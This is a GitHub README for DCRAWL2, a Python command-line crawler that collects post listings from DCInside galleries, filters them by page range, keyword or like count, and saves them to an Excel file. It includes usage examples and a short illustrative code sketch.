Melon4Program/DCRAWL2

DCInside Gallery Crawler

A flexible Python script to crawl posts from DCInside galleries and save the data to an Excel file.

Features

  • Crawl Any Gallery: Works with regular, minor (mgallery), and mini (mini) galleries.
  • Page Range Selection: Specify exactly which pages you want to crawl (e.g., pages 1 through 5).
  • Keyword Filtering: Filter posts by a specific keyword in the title.
  • Data Cleaning: Automatically removes advertisements and other non-post entries to ensure clean data.
  • Excel Export: Saves the extracted data (Number, Title, Author, Views, Link, Liked) into a clean .xlsx file named after the gallery ID.
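The gallery types and the output filename described above can be illustrated with a small sketch. It is not the script's actual code. It assumes that the gallery ID is carried in an `id` query parameter and that minor and mini galleries are identified by a leading `mgallery` or `mini` path segment; `describe_gallery` is a hypothetical helper name.

```python
from urllib.parse import urlparse, parse_qs


def describe_gallery(url: str) -> dict:
    """Return the gallery type, ID, and output filename for a board list URL."""
    parsed = urlparse(url)

    # Assumption: the gallery ID is the value of the `id` query parameter.
    ids = parse_qs(parsed.query).get("id")
    if not ids:
        raise ValueError(f"no gallery id found in {url!r}")
    gallery_id = ids[0]

    # Assumption: the first path segment marks minor and mini galleries.
    segments = [s for s in parsed.path.split("/") if s]
    first = segments[0] if segments else ""
    if first == "mgallery":
        kind = "minor"
    elif first == "mini":
        kind = "mini"
    else:
        kind = "regular"

    # The README states that the .xlsx file is named after the gallery ID.
    return {"type": kind, "id": gallery_id, "filename": f"{gallery_id}.xlsx"}
```

For example, under these assumptions `describe_gallery("https://gall.dcinside.com/mgallery/board/lists/?id=record")` would report a minor gallery with the ID `record` and the filename `record.xlsx`.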

Requirements

  • Python 3.x
  • The libraries listed in requirements.txt.

Installation

  1. Clone the repository or download the files.

  2. Install the required packages using pip:

    pip install -r requirements.txt

Usage

The script is run from the command line with arguments specifying the target gallery and pages.

Command Structure

python <SCRIPT> -l <URL> -p <PAGE_RANGE> [OPTIONS]

Here <SCRIPT> stands for the crawler's Python file in the repository.

Arguments

| Argument | Short Form | Description | Required |
| --- | --- | --- | --- |
| --link | -l | The full URL of the gallery board list. | Yes |
| --pages | -p | The range of pages to crawl (e.g., "1-5"). Defaults to "1-100" if not provided. | No |
| --search-word | -S | An optional keyword to filter posts by their title. | No |
| --liked-number | -L | Filter posts by an exact number of likes. | No |
| --liked-number-over | (none) | Filter posts by a number of likes greater than the specified value. | No |
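As a rough illustration of how these arguments could be declared, here is a minimal `argparse` sketch. The flag names, short forms, and the "1-100" default come from the table; the helper names `parse_page_range` and `build_parser`, the validation rules, and the help strings are assumptions, and the real script may handle them differently.

```python
import argparse
from typing import Tuple


def parse_page_range(text: str) -> Tuple[int, int]:
    """Turn a string such as "1-5" into an inclusive (start, end) pair."""
    start_text, sep, end_text = text.partition("-")
    if not sep:
        raise argparse.ArgumentTypeError(f"expected START-END, got {text!r}")
    try:
        start, end = int(start_text), int(end_text)
    except ValueError:
        raise argparse.ArgumentTypeError(f"page numbers must be integers: {text!r}") from None
    # Assumption: pages start at 1 and the range must not run backwards.
    if start < 1 or end < start:
        raise argparse.ArgumentTypeError(f"invalid page range: {text!r}")
    return start, end


def build_parser() -> argparse.ArgumentParser:
    parser = argparse.ArgumentParser(description="Crawl posts from a DCInside gallery.")
    parser.add_argument("-l", "--link", required=True,
                        help="full URL of the gallery board list")
    # A string default is passed through `type`, so "1-100" becomes (1, 100).
    parser.add_argument("-p", "--pages", type=parse_page_range, default="1-100",
                        help='page range to crawl, e.g. "1-5"')
    parser.add_argument("-S", "--search-word",
                        help="keep only posts whose title contains this keyword")
    parser.add_argument("-L", "--liked-number", type=int,
                        help="keep only posts with exactly this many likes")
    parser.add_argument("--liked-number-over", type=int,
                        help="keep only posts with more likes than this value")
    return parser
```

With this sketch, `build_parser().parse_args(["-l", "<URL>", "-p", "1-3"])` yields `pages == (1, 3)`, and omitting `-p` falls back to the documented default range.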

Examples

  1. Basic Crawling: To crawl pages 1 through 3 of the 'record' minor gallery, where <URL> is that gallery's board list URL:

    python <SCRIPT> -l <URL> -p 1-3
  2. Crawling with a Search Filter: To crawl the first 10 pages of the 'record' gallery and save only posts with the word "녹화" in the title:

    python <SCRIPT> -l <URL> -p 1-10 -S "녹화"
  3. Crawling with Liked Number Filter (Exact): To crawl the first 5 pages and keep only posts with exactly 10 likes:

    python <SCRIPT> -l <URL> -p 1-5 -L 10
  4. Crawling with Liked Number Filter (Over): To crawl the first 5 pages and keep only posts with more than 5 likes:

    python <SCRIPT> -l <URL> -p 1-5 --liked-number-over 5
  5. Crawling without Page Range (Defaults to 1-100): To crawl the first 100 pages of the 'record' gallery:

    python <SCRIPT> -l <URL>
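The filters used in these examples can be pictured as a single predicate applied to each crawled row. The sketch below is illustrative only: the field names Number, Title, and Liked follow the exported columns, but `keep_post`, the rule that genuine posts have a purely numeric Number, and the way the filters combine are assumptions rather than the script's confirmed behavior.

```python
from typing import Optional


def keep_post(post: dict,
              search_word: Optional[str] = None,
              liked_number: Optional[int] = None,
              liked_number_over: Optional[int] = None) -> bool:
    """Decide whether a crawled row should be written to the output."""
    # Assumption: ads and notices carry a non-numeric value in "Number".
    if not str(post.get("Number", "")).isdigit():
        return False

    # Keyword filter: the word must appear somewhere in the title.
    if search_word is not None and search_word not in post.get("Title", ""):
        return False

    liked = int(post.get("Liked", 0))
    # Exact filter: the like count must match.
    if liked_number is not None and liked != liked_number:
        return False
    # "Over" filter: strictly greater than the threshold.
    if liked_number_over is not None and liked <= liked_number_over:
        return False
    return True


# Hypothetical sample rows, made up for illustration.
posts = [
    {"Number": "101", "Title": "녹화 후기", "Liked": 10},
    {"Number": "AD", "Title": "sponsored", "Liked": 0},
    {"Number": "102", "Title": "잡담", "Liked": 6},
]
kept = [p["Number"] for p in posts if keep_post(p, liked_number_over=5)]
```

Note that in this sketch "over" means strictly greater, so `--liked-number-over 5` would keep a post with 6 likes but not one with exactly 5.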

License

This project is licensed under the MIT License.

Disclaimer

This tool is intended for educational purposes only. Please ensure that you have the right to crawl the target website and that you are not violating any terms of service. The user of this script is solely responsible for any legal consequences that may arise from its use.

Contact

For any questions or feedback, please contact the maintainer through the Melon4Program/DCRAWL2 repository.

About

2nd version of DCRAWL
